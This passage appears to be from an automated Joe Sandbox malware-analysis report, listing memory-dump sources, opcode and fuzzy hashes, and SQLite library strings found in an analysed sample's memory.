                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$SELECT segid, term, (pgno>>1), (pgno&1) FROM %Q.'%q_idx' WHERE segid=%d ORDER BY 1, 2$block$misuse
                                                                                                                                                                                                          • API String ID: 0-1560523725
                                                                                                                                                                                                          • Opcode ID: feadd933f07c812bd31872b053f83ae45226a921c4d10243c56451f7b7dbe189
                                                                                                                                                                                                          • Instruction ID: f49a8fce1dc783966ab492a6584f2485dd697728ff162b0746f96a98bdc87001
                                                                                                                                                                                                          • Opcode Fuzzy Hash: feadd933f07c812bd31872b053f83ae45226a921c4d10243c56451f7b7dbe189
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B234921B1AB4396EB589F2594A4BB937A1FF84B88F054035CA6E47BF9CF3CE4518740
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %s a subset of columns on fts5 contentless-delete table: %s$%s contentless fts5 table: %s$'delete' may not be used with a contentless_delete=1 table$cannot DELETE from contentless fts5 table: %s$cannot UPDATE$delete$fts5_locale() requires locale=1$version
                                                                                                                                                                                                          • API String ID: 0-2196455284
                                                                                                                                                                                                          • Opcode ID: 2b6913b390b1c84940994affae7c9a8ac6093eb483c3c98b383ccebf530296ed
                                                                                                                                                                                                          • Instruction ID: 6c987fbc6412045b0e9a47611523f217941ab5de8ae9534db29468107b89988f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b6913b390b1c84940994affae7c9a8ac6093eb483c3c98b383ccebf530296ed
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EF1B16AB1A75386EB609B269470E7A37A0FB84B84F144031DF6D477F9DE3CE4818B00
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: @$BINARY$E$Expression tree is too large (maximum depth %d)$NOCASE$ON clause references tables to its right$false
                                                                                                                                                                                                          • API String ID: 0-1048875598
                                                                                                                                                                                                          • Opcode ID: c37775dcafb2c9ca56a1ff290019ec1c019d98b367699c81505ae858e2e54189
                                                                                                                                                                                                          • Instruction ID: 0df40f3c0163ceb3bc7d6610ed0cf51525883db254602d631da28be42c25d602
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c37775dcafb2c9ca56a1ff290019ec1c019d98b367699c81505ae858e2e54189
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35D2CF62B0A7828AEB648B25C1A4B7977A2FB45B84F045136DE6D47BF9DF3CE441C700
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                                                                          • API String ID: 0-3346138532
                                                                                                                                                                                                          • Opcode ID: bfa8ccc286add4e7574ec9bcdde002d14d4b37fe795130a8d25155253f5d1388
                                                                                                                                                                                                          • Instruction ID: a9414646ed709d4fd343a4bbf52d67321a776da83f52f81907a755217f73c3fa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfa8ccc286add4e7574ec9bcdde002d14d4b37fe795130a8d25155253f5d1388
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9825F3270E78286E7649B25E060AAA7765FB84B84F148435DA6D47BBDDF3DE841CF00
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                                                                          • API String ID: 0-3346138532
                                                                                                                                                                                                          • Opcode ID: 31045656e8ee966943db61b51eeccfaadc4af08e63607a43928766a9e49b298b
                                                                                                                                                                                                          • Instruction ID: f48a24059d030065480d8b7868f44324f6fc5765ab206d0b6df976b1578121e2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31045656e8ee966943db61b51eeccfaadc4af08e63607a43928766a9e49b298b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A725F7270E78286E7649B15E060AAA7765FB84B84F148435DA6D07BBDDF3DE841CF00
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %r %s BY term out of range - should be between 1 and %d$%r ORDER BY term does not match any column in the result set$GROUP$HAVING clause on a non-aggregate query$ORDER$aggregate functions are not allowed in the GROUP BY clause$too many terms in ORDER BY clause
                                                                                                                                                                                                          • API String ID: 0-2302332886
                                                                                                                                                                                                          • Opcode ID: bb623a9a2c18d20b81f837a5029010e69f6c694c5b79584c483b8187198777e4
                                                                                                                                                                                                          • Instruction ID: 6867a1c92369a6c775f29b3167a7b80b81036ca1572438132f272ec60f421631
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb623a9a2c18d20b81f837a5029010e69f6c694c5b79584c483b8187198777e4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7325AB2B0A7439AEB54CF25C5A0AB937A1FB44B88F145039DE2D576F9DB38E455C300
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                                                                          • Opcode ID: 234d24ab78c041c97127b44f915937d46382276f4bd99e440f8e29486e42e105
                                                                                                                                                                                                          • Instruction ID: 568e1743d876581f94a75f43a54c98e0de105dca0a0a1a7d10bb7ceab31a776a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 234d24ab78c041c97127b44f915937d46382276f4bd99e440f8e29486e42e105
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03315232729F8286D760CB25E850AAD73A1FBC8758F544136EAAD47BA8DF3CD5458B00
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$PRAGMA %Q.data_version$SELECT pgno FROM '%q'.'%q_idx' WHERE segid=? AND term<=? ORDER BY term DESC LIMIT 1$block$misuse
                                                                                                                                                                                                          • API String ID: 0-61052504
                                                                                                                                                                                                          • Opcode ID: 6039e6dfbea084de60f5b918ed11e74a4625f3c26040a6dd84f0edff028f9935
                                                                                                                                                                                                          • Instruction ID: 4a23a89fc80ab7f43fe33fc53d2f729a15d6895edacd803f1d3c91d300424867
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6039e6dfbea084de60f5b918ed11e74a4625f3c26040a6dd84f0edff028f9935
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92D23762B2AB4386EB649B15E464BB967A0FF84BD4F094035DAAD077F8DF7CE4418700
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: ?$?$BINARY$Expression tree is too large (maximum depth %d)$auto-index$automatic index on %s(%s)
                                                                                                                                                                                                          • API String ID: 0-2778317500
                                                                                                                                                                                                          • Opcode ID: 69ee29c1a85859ca265612b6d53f71265f5f21c0cc02f3bbb590bb56c0c2f6e5
                                                                                                                                                                                                          • Instruction ID: 7e0a3aa0c4f9adc3e85fc9e85f4badde37b1a9f816797a8a5ac266112d24b2c2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69ee29c1a85859ca265612b6d53f71265f5f21c0cc02f3bbb590bb56c0c2f6e5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AC26B76A09B868AEB60DF15D0A0BAD7BA4FB84B84F058135DB9D437B9DF38D452C700
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$misuse
                                                                                                                                                                                                          • API String ID: 0-968123305
                                                                                                                                                                                                          • Opcode ID: 5e866bf8eac03aac69fd030e9430e884704da55f6b6b6d57d379a419dbebb80b
                                                                                                                                                                                                          • Instruction ID: 6e94bb9be37dbc21bcb8f060af0fa55aacb71978089291c5a73e730a8dd20cec
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e866bf8eac03aac69fd030e9430e884704da55f6b6b6d57d379a419dbebb80b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBA26726B0AB83C5EB548F25D464BB97BA5FB44B88F044135CA2E577F8DE38E8419384
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Expression tree is too large (maximum depth %d)$a NATURAL join may not have an ON or USING clause$ambiguous reference to %s in USING()$cannot join using column %s - column not present in both tables$coalesce$too many arguments on function %T
                                                                                                                                                                                                          • API String ID: 0-1975222901
                                                                                                                                                                                                          • Opcode ID: 0a8ad3a07e2a2db439193ab4861112cef9d9ccec6661ffe5825c11c738ef734c
                                                                                                                                                                                                          • Instruction ID: 9eefc43a2ad4f497b275a8cafd4654d8124c95fd701a53876e6189e723421ddf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a8ad3a07e2a2db439193ab4861112cef9d9ccec6661ffe5825c11c738ef734c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9392AF62B1A78296E760CF15D460BB97BA0FB84B84F15A135DE6D47BE9DF38E440CB00
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$misuse$pB
                                                                                                                                                                                                          • API String ID: 0-1835042228
                                                                                                                                                                                                          • Opcode ID: b7802046852ee24d370f66c328cbcee51484eceb62fac9375367f24bf1df54c6
                                                                                                                                                                                                          • Instruction ID: e6e4ce82e4d565177e702d509558212b226b1084f288398750849310e94f4219
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7802046852ee24d370f66c328cbcee51484eceb62fac9375367f24bf1df54c6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B47238A1B1FB4386EB689B15A460A7933A0FF84B84F144235CA6E477F8DFBCE4518740
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 20c:20e$40f$40f-20a-20d$50f$50f-20a-20d$second
                                                                                                                                                                                                          • API String ID: 0-2094803905
                                                                                                                                                                                                          • Opcode ID: c06cd6adf5e02c2dc99f601cdcf5f653531464e47691ccbe1765fc778dc92821
                                                                                                                                                                                                          • Instruction ID: ee24dd913cea06c4ed822c79d50a0d25d4380b5b8be32b63b2cff80738188a75
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c06cd6adf5e02c2dc99f601cdcf5f653531464e47691ccbe1765fc778dc92821
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC528EA2F2978356E7258F368430A787795AF9574CF14833AD91EA66FCEF38E4418700
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: main$schema$sqlite_$sqlite_master$sqlite_temp_master$temp_schema
                                                                                                                                                                                                          • API String ID: 0-3006123741
                                                                                                                                                                                                          • Opcode ID: 45451b457856cb692d4c14e0e0eed5058c2b8cd0ec89236d97c202284514b5da
                                                                                                                                                                                                          • Instruction ID: 513bd40a4600edd3eac8918704616c41f441364db9520d026bf3dc5d40d00f4a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45451b457856cb692d4c14e0e0eed5058c2b8cd0ec89236d97c202284514b5da
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18121862B0A6D741EB944F268070A7C3FA2EB41B85F544136DABE437F9CA2CE905D7C4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1985247955.00007FFDFB721000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB720000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985189394.00007FFDFB720000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985422116.00007FFDFB884000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985554484.00007FFDFB8BD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985657417.00007FFDFB8C2000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985717297.00007FFDFB8C3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.1985763563.00007FFDFB8C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffdfb720000_#U2800.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
